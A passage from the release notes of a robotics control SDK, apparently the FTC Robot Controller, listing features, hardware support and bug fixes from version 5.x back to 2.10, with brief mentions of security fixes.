normally be solid green, without blinking to indicate the address The Control Hub will not be shown on the Expansion Hub Address Change settings page Improves REV Hub firmware updater The user can now choose between all available firmware update files Version 1.8.2 of the REV Hub firmware is bundled into the Robot Controller app. Text was added to clarify that Expansion Hubs can only be updated via USB. Firmware update speed was reduced to improve reliability Allows REV Hub firmware to be updated directly from the Manage webpage Improves log viewer on Robot Controller Horizontal scrolling support (no longer word wrapped) Supports pinch-to-zoom Uses a monospaced font Error messages are highlighted New color scheme Attempts to force-stop a runaway/stuck OpMode without restarting the entire app Not all types of runaway conditions are stoppable, but if the user code attempts to talk to hardware during the runaway, the system should be able to capture it. Makes various tweaks to the Self Inspect screen Renames "OS version" entry to "Android version" Renames "WiFi Direct Name" to "WiFi Name" Adds Control Hub OS version, when viewing the report of a Control Hub Hides the airplane mode entry, when viewing the report of a Control Hub Removes check for ZTE Speed Channel Changer Shows firmware version for all Expansion and Control Hubs Reworks network settings portion of Manage page All network settings are now applied with a single click The WiFi Direct channel of phone-based Robot Controllers can now be changed from the Manage page WiFi channels are filtered by band (2.4 vs 5 GHz) and whether they overlap with other channels The current WiFi channel is pre-selected on phone-based Robot Controllers, and Control Hubs running OS 1.1.2 or later. On Control Hubs running OS 1.1.2 or later, you can choose to have the system automatically select a channel on the 5 GHz band Improves OnBotJava New light and dark themes replace the old themes (chaos, github, chrome,...) the new default theme is light and will be used when you first update to this version OnBotJava now has a tabbed editor Read-only offline mode Improves function of "exit" menu item on Robot Controller and Driver Station Now guaranteed to be fully stopped and unloaded from memory Shows a warning message if a LinearOpMode exists prematurely due to failure to monitor for the start condition Improves error message shown when the Driver Station and Robot Controller are incompatible with each other Driver Station OpMode Control Panel now disabled while a Restart Robot is in progress Disables advanced settings related to WiFi direct when the Robot Controller is a Control Hub. Tint phone battery icons on Driver Station when low/critical. Uses names "Control Hub Portal" and "Control Hub" (when appropriate) in new configuration files Improve I2C read performance Very large improvement on Control Hub; up to ~2x faster with small (e.g. 6 byte) reads Not as apparent on Expansion Hubs connected to a phone Update/refresh build infrastructure Update to 'androidx' support library from 'com.android.support:appcompat', which is end-of-life Update targetSdkVersion and compileSdkVersion to 28 Update Android Studio's Android plugin to latest Fix reported build timestamp in 'About' screen Add sample illustrating manual webcam use: ConceptWebcam Bug fixes Fixes SkyStone issue #248 Fixes SkyStone issue #232 and modifies bulk caching semantics to allow for cache-preserving MANUAL/AUTO transitions. Improves performance when REV 2M distance sensor is unplugged Improves readability of Toast messages on certain devices Allows a Driver Station to connect to a Robot Controller after another has disconnected Improves generation of fake serial numbers for UVC cameras which do not provide a real serial number Previously some devices would assign such cameras a serial of 0:0 and fail to open and start streaming Fixes ftc_app issue #638. Fixes a slew of bugs with the Vuforia camera monitor including: Fixes bug where preview could be displayed with a wonky aspect ratio Fixes bug where preview could be cut off in landscape Fixes bug where preview got totally messed up when rotating phone Fixes bug where crosshair could drift off target when using webcams Fixes issue in UVC driver on some devices (ftc_app 681) if streaming was started/stopped multiple times in a row Issue manifested as kernel panic on devices which do not have this kernel patch. On affected devices which do have the patch, the issue was manifest as simply a failure to start streaming. The Tech Team believes that the root cause of the issue is a bug in the Linux kernel XHCI driver. A workaround was implemented in the SDK UVC driver. Fixes bug in UVC driver where often half the frames from the camera would be dropped (e.g. only 15FPS delivered during a streaming session configured for 30FPS). Fixes issue where TensorFlow Object Detection would show results whose confidence was lower than the minimum confidence parameter. Fixes a potential exploitation issue of CVE-2019-11358 in OnBotJava Fixes changing the address of an Expansion Hub with additional Expansion Hubs connected to it Preserves the Control Hub's network connection when "Restart Robot" is selected Fixes issue where device scans would fail while the Robot was restarting Fix RenderScript usage Use androidx.renderscript variant: increased compatibility Use RenderScript in Java mode, not native: simplifies build Fixes webcam-frame-to-bitmap conversion problem: alpha channel wasn't being initialized, only R, G, & B Fixes possible arithmetic overflow in Deadline Fixes deadlock in Vuforia webcam support which could cause 5-second delays when stopping OpMode Version 5.4 (20200108-101156) Fixes SkyStone issue #88 Adds an inspection item that notes when a robot controller (Control Hub) is using the factory default password. Fixes SkyStone issue #61 Fixes SkyStone issue #142 Fixes ftc_app issue #417 by adding more current and voltage monitoring capabilities for REV Hubs. Fixes a crash sometimes caused by OnBotJava activity Improves OnBotJava autosave functionality ftc_app #738 Fixes system responsiveness issue when an Expansion Hub is disconnected Fixes issue where IMU initialization could prevent Op Modes from stopping Fixes issue where AndroidTextToSpeech.speak() would fail if it was called too early Adds telemetry.speak() methods and blocks, which cause the Driver Station (if also updated) to speak text Adds and improves Expansion Hub-related warnings Improves Expansion Hub low battery warning Displays the warning immediately after the hub reports it Specifies whether the condition is current or occurred temporarily during an OpMode run Displays which hubs reported low battery Displays warning when hub loses and regains power during an OpMode run Fixes the hub's LED pattern after this condition Displays warning when Expansion Hub is not responding to commands Specifies whether the condition is current or occurred temporarily during an OpMode run Clarifies warning when Expansion Hub is not present at startup Specifies that this condition requires a Robot Restart before the hub can be used. The hub light will now accurately reflect this state Improves logging and reduces log spam during these conditions Syncs the Control Hub time and timezone to a connected web browser programming the robot, if a Driver Station is not available. Adds bulk read functionality for REV Hubs A bulk caching mode must be set at the Hub level with LynxModule#setBulkCachingMode(). This applies to all relevant SDK hardware classes that reference that Hub. The following following Hub bulk caching modes are available: BulkCachingMode.OFF (default): All hardware calls operate as usual. Bulk data can read through LynxModule#getBulkData() and processed manually. BulkCachingMode.AUTO: Applicable hardware calls are served from a bulk read cache that is cleared/refreshed automatically to ensure identical commands don't hit the same cache. The cache can also be cleared manually with LynxModule#clearBulkCache(), although this is not recommended. (advanced users) BulkCachingMode.MANUAL: Same as BulkCachingMode.AUTO except the cache is never cleared automatically. To avoid getting stale data, the cache must be manually cleared at the beginning of each loop body or as the user deems appropriate. Removes PIDF Annotation values added in Rev 5.3 (to AndyMark, goBILDA and TETRIX motor configurations). The new motor types will still be available but their Default control behavior will revert back to Rev 5.2 Adds new ConceptMotorBulkRead sample Opmode to demonstrate and compare Motor Bulk-Read modes for reducing I/O latencies. Version 5.3 (20191004-112306) Fixes external USB/UVC webcam support Makes various bugfixes and improvements to Blocks page, including but not limited to: Many visual tweaks Browser zoom and window resize behave better Resizing the Java preview pane works better and more consistently across browsers The Java preview pane consistently gets scrollbars when needed The Java preview pane is hidden by default on phones Internet Explorer 11 should work Large dropdown lists display properly on lower res screens Disabled buttons are now visually identifiable as disabled A warning is shown if a user selects a TFOD sample, but their device is not compatible Warning messages in a Blocks op mode are now visible by default. Adds goBILDA 5201 and 5202 motors to Robot Configurator Adds PIDF Annotation values to AndyMark, goBILDA and TETRIX motor configurations. This has the effect of causing the RUN_USING_ENCODERS and RUN_TO_POSITION modes to use PIDF vs PID closed loop control on these motors. This should provide more responsive, yet stable, speed control. PIDF adds Feedforward control to the basic PID control loop. Feedforward is useful when controlling a motor's speed because it "anticipates" how much the control voltage must change to achieve a new speed set-point, rather than requiring the integrated error to change sufficiently. The PIDF values were chosen to provide responsive, yet stable, speed control on a lightly loaded motor. The more heavily a motor is loaded (drag or friction), the more noticable the PIDF improvement will be. Fixes startup crash on Android 10 Fixes ftc_app issue #712 (thanks to FROGbots-4634) Fixes ftc_app issue #542 Allows "A" and lowercase letters when naming device through RC and DS apps. Version 5.2 (20190905-083277) Fixes extra-wide margins on settings activities, and placement of the new configuration button Adds Skystone Vuforia image target data. Includes sample Skystone Vuforia Navigation op modes (Java). Includes sample Skystone Vuforia Navigation op modes (Blocks). Adds TensorFlow inference model (.tflite) for Skystone game elements. Includes sample Skystone TensorFlow op modes (Java). Includes sample Skystone TensorFlow op modes (Blocks). Removes older (season-specific) sample op modes. Includes 64-bit support (to comply with Google Play requirements). Protects against Stuck OpModes when a Restart Robot is requested. (Thanks to FROGbots-4634) (ftc_app issue #709) Blocks related changes: Fixes bug with blocks generated code when hardware device name is a java or javascript reserved word. Shows generated java code for blocks, even when hardware items are missing from the active configuration. Displays warning icon when outdated Vuforia and TensorFlow blocks are used (SkyStone issue #27) Version 5.1 (20190820-222104) Defines default PIDF parameters for the following motors: REV Core Hex Motor REV 20:1 HD Hex Motor REV 40:1 HD Hex Motor Adds back button when running on a device without a system back button (such as a Control Hub) Allows a REV Control Hub to update the firmware on a REV Expansion Hub via USB Fixes SkyStone issue #9 Fixes ftc_app issue #715 Prevents extra DS User clicks by filtering based on current state. Prevents incorrect DS UI state changes when receiving new OpMode list from RC Adds support for REV Color Sensor V3 Adds a manual-refresh DS Camera Stream for remotely viewing RC camera frames. To show the stream on the DS, initialize but do not run a stream-enabled opmode, select the Camera Stream option in the DS menu, and tap the image to refresh. This feature is automatically enabled when using Vuforia or TFOD—no additional RC configuration is required for typical use cases. To hide the stream, select the same menu item again. Note that gamepads are disabled and the selected opmode cannot be started while the stream is open as a safety precaution. To use custom streams, consult the API docs for CameraStreamServer#setSource and CameraStreamSource. Adds many Star Wars sounds to RobotController resources. Added SKYSTONE Sounds Chooser Sample Program. Switches out startup, connect chimes, and error/warning sounds for Star Wars sounds Updates OnBot Java to use a WebSocket for communication with the robot The OnBot Java page no longer has to do a full refresh when a user switches from editing one file to another Known issues: Camera Stream The Vuforia camera stream inherits the issues present in the phone preview (namely ftc_app issue #574). This problem does not affect the TFOD camera stream even though it receives frames from Vuforia. The orientation of the stream frames may not always match the phone preview. For now, these frames may be rotated manually via a custom CameraStreamSource if desired. OnBotJava Browser back button may not always work correctly It's possible for a build to be queued, but not started. The OnBot Java build console will display a warning if this occurs. A user might not realize they are editing a different file if the user inadvertently switches from one file to another since this switch is now seamless. The name of the currently open file is displayed in the browser tab. Version 5.0 (built on 19.06.14) Support for the REV Robotics Control Hub. Adds a Java preview pane to the Blocks editor. Adds a new offline export feature to the Blocks editor. Display wifi channel in Network circle on Driver Station. Adds calibration for Logitech C270 Updates build tooling and target SDK. Compliance with Google's permissions infrastructure (Required after build tooling update). Keep Alives to mitigate the Motorola wifi scanning problem. Telemetry substitute no longer necessary. Improves Vuforia error reporting. Fixes ftctechnh/ftc_app issues 621, 713. Miscellaneous bug fixes and improvements. Version 4.3 (built on 18.10.31) Includes missing TensorFlow-related libraries and files. Version 4.2 (built on 18.10.30) Includes fix to avoid deadlock situation with WatchdogMonitor which could result in USB communication errors. Comm error appeared to require that user disconnect USB cable and restart the Robot Controller app to recover. robotControllerLog.txt would have error messages that included the words "E RobotCore: lynx xmit lock: #### abandoning lock:" Includes fix to correctly list the parent module address for a REV Robotics Expansion Hub in a configuration (.xml) file. Bug in versions 4.0 and 4.1 would incorrect list the address module for a parent REV Robotics device as "1". If the parent module had a higher address value than the daisy-chained module, then this bug would prevent the Robot Controller from communicating with the downstream Expansion Hub. Added requirement for ACCESS_COARSE_LOCATION to allow a Driver Station running Android Oreo to scan for Wi-Fi Direct devices. Added google() repo to build.gradle because aapt2 must be downloaded from the google() repository beginning with version 3.2 of the Android Gradle Plugin. Important Note: Android Studio users will need to be connected to the Internet the first time build the ftc_app project. Internet connectivity is required for the first build so the appropriate files can be downloaded from the Google repository. Users should not need to be connected to the Internet for subsequent builds. This should also fix buid issue where Android Studio would complain that it "Could not find com.android.tools.lint:lint-gradle:26.1.4" (or similar). Added support for REV Spark Mini motor controller as part of the configuration menu for a servo/PWM port on the REV Expansion Hub. Provide examples for playing audio files in an Op Mode. Block Development Tool Changes Includes a fix for a problem with the Velocity blocks that were reported in the FTC Technology forum (Blocks Programming subforum). Change the "Save completed successfully." message to a white color so it will contrast with a green background. Fixed the "Download image" feature so it will work if there are text blocks in the op mode. Introduce support for Google's TensorFlow Lite technology for object detetion for 2018-2019 game. TensorFlow lite can recognize Gold Mineral and Silver Mineral from 2018-2019 game. Example Java and Block op modes are included to show how to determine the relative position of the gold block (left, center, right). Version 4.1 (released on 18.09.24) Changes include: Fix to prevent crash when deprecated configuration annotations are used. Change to allow FTC Robot Controller APK to be auto-updated using FIRST Global Control Hub update scripts. Removed samples for non supported / non legal hardware. Improvements to Telemetry.addData block with "text" socket. Updated Blocks sample op mode list to include Rover Ruckus Vuforia example. Update SDK library version number. Version 4.0 (released on 18.09.12) Changes include: Initial support for UVC compatible cameras If UVC camera has a unique serial number, RC will detect and enumerate by serial number. If UVC camera lacks a unique serial number, RC will only support one camera of that type connected. Calibration settings for a few cameras are included (see TeamCode/src/main/res/xml/teamwebcamcalibrations.xml for details). User can upload calibration files from Program and Manage web interface. UVC cameras seem to draw a fair amount of electrical current from the USB bus. This does not appear to present any problems for the REV Robotics Control Hub. This does seem to create stability problems when using some cameras with an Android phone-based Robot Controller. FTC Tech Team is investigating options to mitigate this issue with the phone-based Robot Controllers. Updated sample Vuforia Navigation and VuMark Op Modes to demonstrate how to use an internal phone-based camera and an external UVC webcam. Support for improved motor control. REV Robotics Expansion Hub firmware 1.8 and greater will support a feed forward mechanism for closed loop motor control. FTC SDK has been modified to support PIDF coefficients (proportional, integral, derivative, and feed forward). FTC Blocks development tool modified to include PIDF programming blocks. Deprecated older PID-related methods and variables. REV's 1.8.x PIDF-related changes provide a more linear and accurate way to control a motor. Wireless Added 5GHz support for wireless channel changing for those devices that support it. Tested with Moto G5 and E4 phones. Also tested with other (currently non-approved) phones such as Samsung Galaxy S8. Improved Expansion Hub firmware update support in Robot Controller app Changes to make the system more robust during the firmware update process (when performed through Robot Controller app). User no longer has to disconnect a downstream daisy-chained Expansion Hub when updating an Expansion Hub's firmware. If user is updating an Expansion Hub's firmware through a USB connection, he/she does not have to disconnect RS485 connection to other Expansion Hubs. The user still must use a USB connection to update an Expansion Hub's firmware. The user cannot update the Expansion Hub firmware for a downstream device that is daisy chained through an RS485 connection. If an Expansion Hub accidentally gets "bricked" the Robot Controller app is now more likely to recognize the Hub when it scans the USB bus. Robot Controller app should be able to detect an Expansion Hub, even if it accidentally was bricked in a previous update attempt. Robot Controller app should be able to install the firmware onto the Hub, even if if accidentally was bricked in a previous update attempt. Resiliency FTC software can detect and enable an FTDI reset feature that is available with REV Robotics v1.8 Expansion Hub firmware and greater. When enabled, the Expansion Hub can detect if it hasn't communicated with the Robot Controller over the FTDI (USB) connection. If the Hub hasn't heard from the Robot Controller in a while, it will reset the FTDI connection. This action helps system recover from some ESD-induced disruptions. Various fixes to improve reliability of FTC software. Blocks Fixed errors with string and list indices in blocks export to java. Support for USB connected UVC webcams. Refactored optimized Blocks Vuforia code to support Rover Ruckus image targets. Added programming blocks to support PIDF (proportional, integral, derivative and feed forward) motor control. Added formatting options (under Telemetry and Miscellaneous categories) so user can set how many decimal places to display a numerical value. Support to play audio files (which are uploaded through Blocks web interface) on Driver Station in addition to the Robot Controller. Fixed bug with Download Image of Blocks feature. Support for REV Robotics Blinkin LED Controller. Support for REV Robotics 2m Distance Sensor. Added support for a REV Touch Sensor (no longer have to configure as a generic digital device). Added blocks for DcMotorEx methods. These are enhanced methods that you can use when supported by the motor controller hardware. The REV Robotics Expansion Hub supports these enhanced methods. Enhanced methods include methods to get/set motor velocity (in encoder pulses per second), get/set PIDF coefficients, etc.. Modest Improvements in Logging Decrease frequency of battery checker voltage statements. Removed non-FTC related log statements (wherever possible). Introduced a "Match Logging" feature. Under "Settings" a user can enable/disable this feature (it's disabled by default). If enabled, user provides a "Match Number" through the Driver Station user interface (top of the screen). The Match Number is used to create a log file specifically with log statements from that particular Op Mode run. Match log files are stored in /sdcard/FIRST/matlogs on the Robot Controller. Once an op mode run is complete, the Match Number is cleared. This is a convenient way to create a separate match log with statements only related to a specific op mode run. New Devices Support for REV Robotics Blinkin LED Controller. Support for REV Robotics 2m Distance Sensor. Added configuration option for REV 20:1 HD Hex Motor. Added support for a REV Touch Sensor (no longer have to configure as a generic digital device). Miscellaneous Fixed some errors in the definitions for acceleration and velocity in our javadoc documentation. Added ability to play audio files on Driver Station When user is configuring an Expansion Hub, the LED on the Expansion Hub will change blink pattern (purple-cyan) to indicate which Hub is currently being configured. Renamed I2cSensorType to I2cDeviceType. Added an external sample Op Mode that demonstrates localization using 2018-2019 (Rover Ruckus presented by QualComm) Vuforia targets. Added an external sample Op Mode that demonstrates how to use the REV Robotics 2m Laser Distance Sensor. Added an external sample Op Mode that demonstrates how to use the REV Robotics Blinkin LED Controller. Re-categorized external Java sample Op Modes to "TeleOp" instead of "Autonomous". Known issues: Initial support for UVC compatible cameras UVC cameras seem to draw significant amount of current from the USB bus. This does not appear to present any problems for the REV Robotics Control Hub. This does seem to create stability problems when using some cameras with an Android phone-based Robot Controller. FTC Tech Team is investigating options to mitigate this issue with the phone-based Robot Controllers. There might be a possible deadlock which causes the RC to become unresponsive when using a UVC webcam with a Nougat Android Robot Controller. Wireless When user selects a wireless channel, this channel does not necessarily persist if the phone is power cycled. Tech Team is hoping to eventually address this issue in a future release. Issue has been present since apps were introduced (i.e., it is not new with the v4.0 release). Wireless channel is not currently displayed for WiFi Direct connections. Miscellaneous The blink indication feature that shows which Expansion Hub is currently being configured does not work for a newly created configuration file. User has to first save a newly created configuration file and then close and re-edit the file in order for blink indicator to work. Version 3.6 (built on 17.12.18) Changes include: Blocks Changes Uses updated Google Blockly software to allow users to edit their op modes on Apple iOS devices (including iPad and iPhone). Improvement in Blocks tool to handle corrupt op mode files. Autonomous op modes should no longer get switched back to tele-op after re-opening them to be edited. The system can now detect type mismatches during runtime and alert the user with a message on the Driver Station. Updated javadoc documentation for setPower() method to reflect correct range of values (-1 to +1). Modified VuforiaLocalizerImpl to allow for user rendering of frames Added a user-overrideable onRenderFrame() method which gets called by the class's renderFrame() method. Version 3.5 (built on 17.10.30) Changes with version 3.5 include: Introduced a fix to prevent random op mode stops, which can occur after the Robot Controller app has been paused and then resumed (for example, when a user temporarily turns off the display of the Robot Controller phone, and then turns the screen back on). Introduced a fix to prevent random op mode stops, which were previously caused by random peer disconnect events on the Driver Station. Fixes issue where log files would be closed on pause of the RC or DS, but not re-opened upon resume. Fixes issue with battery handler (voltage) start/stop race. Fixes issue where Android Studio generated op modes would disappear from available list in certain situations. Fixes problem where OnBot Java would not build on REV Robotics Control Hub. Fixes problem where OnBot Java would not build if the date and time on the Robot Controller device was "rewound" (set to an earlier date/time). Improved error message on OnBot Java that occurs when renaming a file fails. Removed unneeded resources from android.jar binaries used by OnBot Java to reduce final size of Robot Controller app. Added MR_ANALOG_TOUCH_SENSOR block to Blocks Programming Tool. Version 3.4 (built on 17.09.06) Changes with version 3.4 include: Added telemetry.update() statement for BlankLinearOpMode template. Renamed sample Block op modes to be more consistent with Java samples. Added some additional sample Block op modes. Reworded OnBot Java readme slightly. Version 3.3 (built on 17.09.04) This version of the software includes improves for the FTC Blocks Programming Tool and the OnBot Java Programming Tool. Changes with verion 3.3 include: Android Studio ftc_app project has been updated to use Gradle Plugin 2.3.3. Android Studio ftc_app project is already using gradle 3.5 distribution. Robot Controller log has been renamed to /sdcard/RobotControllerLog.txt (note that this change was actually introduced w/ v3.2). Improvements in I2C reliability. Optimized I2C read for REV Expansion Hub, with v1.7 firmware or greater. Updated all external/samples (available through OnBot and in Android project folder). Vuforia Added support for VuMarks that will be used for the 2017-2018 season game. Blocks Update to latest Google Blockly release. Sample op modes can be selected as a template when creating new op mode. Fixed bug where the blocks would disappear temporarily when mouse button is held down. Added blocks for Range.clip and Range.scale. User can now disable/enable Block op modes. Fix to prevent occasional Blocks deadlock. OnBot Java Significant improvements with autocomplete function for OnBot Java editor. Sample op modes can be selected as a template when creating new op mode. Fixes and changes to complete hardware setup feature. Updated (and more useful) onBot welcome message. Known issues: Android Studio After updating to the new v3.3 Android Studio project folder, if you get error messages indicating "InvalidVirtualFileAccessException" then you might need to do a File->Invalidate Caches / Restart to clear the error. OnBot Java Sometimes when you push the build button to build all op modes, the RC returns an error message that the build failed. If you press the build button a second time, the build typically suceeds. Version 3.2 (built on 17.08.02) This version of the software introduces the "OnBot Java" Development Tool. Similar to the FTC Blocks Development Tool, the FTC OnBot Java Development Tool allows a user to create, edit and build op modes dynamically using only a Javascript-enabled web browser. The OnBot Java Development Tool is an integrated development environment (IDE) that is served up by the Robot Controller. Op modes are created and edited using a Javascript-enabled browser (Google Chromse is recommended). Op modes are saved on the Robot Controller Android device directly. The OnBot Java Development Tool provides a Java programming environment that does NOT need Android Studio. Changes with version 3.2 include: Enhanced web-based development tools Introduction of OnBot Java Development Tool. Web-based programming and management features are "always on" (user no longer needs to put Robot Controller into programming mode). Web-based management interface (where user can change Robot Controller name and also easily download Robot Controller log file). OnBot Java, Blocks and Management features available from web based interface. Blocks Programming Development Tool: Changed "LynxI2cColorRangeSensor" block to "REV Color/range sensor" block. Fixed tooltip for ColorSensor.isLightOn block. Added blocks for ColorSensor.getNormalizedColors and LynxI2cColorRangeSensor.getNormalizedColors. Added example op modes for digital touch sensor and REV Robotics Color Distance sensor. User selectable color themes. Includes many minor enhancements and fixes (too numerous to list). Known issues: Auto complete function is incomplete and does not support the following (for now): Access via this keyword Access via super keyword Members of the super cloass, not overridden by the class Any methods provided in the current class Inner classes Can't handle casted objects Any objects coming from an parenthetically enclosed expression Version 3.10 (built on 17.05.09) This version of the software provides support for the REV Robotics Expansion Hub. This version also includes improvements in the USB communication layer in an effort to enhance system resiliency. If you were using a 2.x version of the software previously, updating to version 3.1 requires that you also update your Driver Station software in addition to updating the Robot Controller software. Also note that in version 3.10 software, the setMaxSpeed and getMaxSpeed methods are no longer available (not deprecated, they have been removed from the SDK). Also note that the the new 3.x software incorporates motor profiles that a user can select as he/she configures the robot. Changes include: Blocks changes Added VuforiaTrackableDefaultListener.getPose and Vuforia.trackPose blocks. Added optimized blocks support for Vuforia extended tracking. Added atan2 block to the math category. Added useCompetitionFieldTargetLocations parameter to Vuforia.initialize block. If set to false, the target locations are placed at (0,0,0) with target orientation as specified in https://github.com/gearsincorg/FTCVuforiaDemo/blob/master/Robot_Navigation.java tutorial op mode. Incorporates additional improvements to USB comm layer to improve system resiliency (to recover from a greater number of communication disruptions). Additional Notes Regarding Version 3.00 (built on 17.04.13) In addition to the release changes listed below (see section labeled "Version 3.00 (built on 17.04.013)"), version 3.00 has the following important changes: Version 3.00 software uses a new version of the FTC Robocol (robot protocol). If you upgrade to v3.0 on the Robot Controller and/or Android Studio side, you must also upgrade the Driver Station software to match the new Robocol. Version 3.00 software removes the setMaxSpeed and getMaxSpeed methods from the DcMotor class. If you have an op mode that formerly used these methods, you will need to remove the references/calls to these methods. Instead, v3.0 provides the max speed information through the use of motor profiles that are selected by the user during robot configuration. Version 3.00 software currently does not have a mechanism to disable extra i2c sensors. We hope to re-introduce this function with a release in the near future. Version 3.00 (built on 17.04.13) *** Use this version of the software at YOUR OWN RISK!!! *** This software is being released as an "alpha" version. Use this version at your own risk! This pre-release software contains SIGNIFICANT changes, including changes to the Wi-Fi Direct pairing mechanism, rewrites of the I2C sensor classes, changes to the USB/FTDI layer, and the introduction of support for the REV Robotics Expansion Hub and the REV Robotics color-range-light sensor. These changes were implemented to improve the reliability and resiliency of the FTC control system. Please note, however, that version 3.00 is considered "alpha" code. This code is being released so that the FIRST community will have an opportunity to test the new REV Expansion Hub electronics module when it becomes available in May. The developers do not recommend using this code for critical applications (i.e., competition use). *** Use this version of the software at YOUR OWN RISK!!! *** Changes include: Major rework of sensor-related infrastructure. Includes rewriting sensor classes to implement synchronous I2C communication. Fix to reset Autonomous timer back to 30 seconds. Implementation of specific motor profiles for approved 12V motors (includes Tetrix, AndyMark, Matrix and REV models). Modest improvements to enhance Wi-Fi P2P pairing. Fixes telemetry log addition race. Publishes all the sources (not just a select few). Includes Block programming improvements Addition of optimized Vuforia blocks. Auto scrollbar to projects and sounds pages. Fixed blocks paste bug. Blocks execute after while-opModeIsActive loop (to allow for cleanup before exiting op mode). Added gyro integratedZValue block. Fixes bug with projects page for Firefox browser. Added IsSpeaking block to AndroidTextToSpeech. Implements support for the REV Robotics Expansion Hub Implements support for integral REV IMU (physically installed on I2C bus 0, uses same Bosch BNO055 9 axis absolute orientation sensor as Adafruit 9DOF abs orientation sensor). - Implements support for REV color/range/light sensor. Provides support to update Expansion Hub firmware through FTC SDK. Detects REV firmware version and records in log file. Includes support for REV Control Hub (note that the REV Control Hub is not yet approved for FTC use). Implements FTC Blocks programming support for REV Expansion Hub and sensor hardware. Detects and alerts when I2C device disconnect. Version 2.62 (built on 17.01.07) Added null pointer check before calling modeToByte() in finishModeSwitchIfNecessary method for ModernRoboticsUsbDcMotorController class. Changes to enhance Modern Robotics USB protocol robustness. Version 2.61 (released on 16.12.19) Blocks Programming mode changes: Fix to correct issue when an exception was thrown because an OpticalDistanceSensor object appears twice in the hardware map (the second time as a LightSensor). Version 2.6 (released on 16.12.16) Fixes for Gyro class: Improve (decrease) sensor refresh latency. fix isCalibrating issues. Blocks Programming mode changes: Blocks now ignores a device in the configuration xml if the name is empty. Other devices work in configuration work fine. Version 2.5 (internal release on released on 16.12.13) Blocks Programming mode changes: Added blocks support for AdafruitBNO055IMU. Added Download Op Mode button to FtcBocks.html. Added support for copying blocks in one OpMode and pasting them in an other OpMode. The clipboard content is stored on the phone, so the programming mode server must be running. Modified Utilities section of the toolbox. In Programming Mode, display information about the active connections. Fixed paste location when workspace has been scrolled. Added blocks support for the android Accelerometer. Fixed issue where Blocks Upload Op Mode truncated name at first dot. Added blocks support for Android SoundPool. Added type safety to blocks for Acceleration. Added type safety to blocks for AdafruitBNO055IMU.Parameters. Added type safety to blocks for AnalogInput. Added type safety to blocks for AngularVelocity. Added type safety to blocks for Color. Added type safety to blocks for ColorSensor. Added type safety to blocks for CompassSensor. Added type safety to blocks for CRServo. Added type safety to blocks for DigitalChannel. Added type safety to blocks for ElapsedTime. Added type safety to blocks for Gamepad. Added type safety to blocks for GyroSensor. Added type safety to blocks for IrSeekerSensor. Added type safety to blocks for LED. Added type safety to blocks for LightSensor. Added type safety to blocks for LinearOpMode. Added type safety to blocks for MagneticFlux. Added type safety to blocks for MatrixF. Added type safety to blocks for MrI2cCompassSensor. Added type safety to blocks for MrI2cRangeSensor. Added type safety to blocks for OpticalDistanceSensor. Added type safety to blocks for Orientation. Added type safety to blocks for Position. Added type safety to blocks for Quaternion. Added type safety to blocks for Servo. Added type safety to blocks for ServoController. Added type safety to blocks for Telemetry. Added type safety to blocks for Temperature. Added type safety to blocks for TouchSensor. Added type safety to blocks for UltrasonicSensor. Added type safety to blocks for VectorF. Added type safety to blocks for Velocity. Added type safety to blocks for VoltageSensor. Added type safety to blocks for VuforiaLocalizer.Parameters. Added type safety to blocks for VuforiaTrackable. Added type safety to blocks for VuforiaTrackables. Added type safety to blocks for enums in AdafruitBNO055IMU.Parameters. Added type safety to blocks for AndroidAccelerometer, AndroidGyroscope, AndroidOrientation, and AndroidTextToSpeech. Version 2.4 (released on 16.11.13) Fix to avoid crashing for nonexistent resources. Blocks Programming mode changes: Added blocks to support OpenGLMatrix, MatrixF, and VectorF. Added blocks to support AngleUnit, AxesOrder, AxesReference, CameraDirection, CameraMonitorFeedback, DistanceUnit, and TempUnit. Added blocks to support Acceleration. Added blocks to support LinearOpMode.getRuntime. Added blocks to support MagneticFlux and Position. Fixed typos. Made blocks for ElapsedTime more consistent with other objects. Added blocks to support Quaternion, Velocity, Orientation, AngularVelocity. Added blocks to support VuforiaTrackables, VuforiaTrackable, VuforiaLocalizer, VuforiaTrackableDefaultListener. Fixed a few blocks. Added type checking to new blocks. Updated to latest blockly. Added default variable blocks to navigation and matrix blocks. Fixed toolbox entry for openGLMatrix_rotation_withAxesArgs. When user downloads Blocks-generated op mode, only the .blk file is downloaded. When user uploads Blocks-generated op mode (.blk file), Javascript code is auto generated. Added DbgLog support. Added logging when a blocks file is read/written. Fixed bug to properly render blocks even if missing devices from configuration file. Added support for additional characters (not just alphanumeric) for the block file names (for download and upload). Added support for OpMode flavor (“Autonomous” or “TeleOp”) and group. Changes to Samples to prevent tutorial issues. Incorporated suggested changes from public pull 216 (“Replace .. paths”). Remove Servo Glitches when robot stopped. if user hits “Cancels” when editing a configuration file, clears the unsaved changes and reverts to original unmodified configuration. Added log info to help diagnose why the Robot Controller app was terminated (for example, by watch dog function). Added ability to transfer log from the controller. Fixed inconsistency for AngularVelocity Limit unbounded growth of data for telemetry. If user does not call telemetry.update() for LinearOpMode in a timely manner, data added for telemetry might get lost if size limit is exceeded. Version 2.35 (released on 16.10.06) Blockly programming mode - Removed unnecesary idle() call from blocks for new project. Version 2.30 (released on 16.10.05) Blockly programming mode: Mechanism added to save Blockly op modes from Programming Mode Server onto local device To avoid clutter, blocks are displayed in categorized folders Added support for DigitalChannel Added support for ModernRoboticsI2cCompassSensor Added support for ModernRoboticsI2cRangeSensor Added support for VoltageSensor Added support for AnalogInput Added support for AnalogOutput Fix for CompassSensor setMode block Vuforia Fix deadlock / make camera data available while Vuforia is running. Update to Vuforia 6.0.117 (recommended by Vuforia and Google to close security loophole). Fix for autonomous 30 second timer bug (where timer was in effect, even though it appeared to have timed out). opModeIsActive changes to allow cleanup after op mode is stopped (with enforced 2 second safety timeout). Fix to avoid reading i2c twice. Updated sample Op Modes. Improved logging and fixed intermittent freezing. Added digital I/O sample. Cleaned up device names in sample op modes to be consistent with Pushbot guide. Fix to allow use of IrSeekerSensorV3. Version 2.20 (released on 16.09.08) Support for Modern Robotics Compass Sensor. Support for Modern Robotics Range Sensor. Revise device names for Pushbot templates to match the names used in Pushbot guide. Fixed bug so that IrSeekerSensorV3 device is accessible as IrSeekerSensor in hardwareMap. Modified computer vision code to require an individual Vuforia license (per legal requirement from PTC). Minor fixes. Blockly enhancements: Support for Voltage Sensor. Support for Analog Input. Support for Analog Output. Support for Light Sensor. Support for Servo Controller. Version 2.10 (released on 16.09.03) Support for Adafruit IMU. Improvements to ModernRoboticsI2cGyro class Block on reset of z axis. isCalibrating() returns true while gyro is calibration. Updated sample gyro program. Blockly enhancements support for android.graphics.Color. added support for ElapsedTime. improved look and legibility of blocks. support for compass sensor. support for 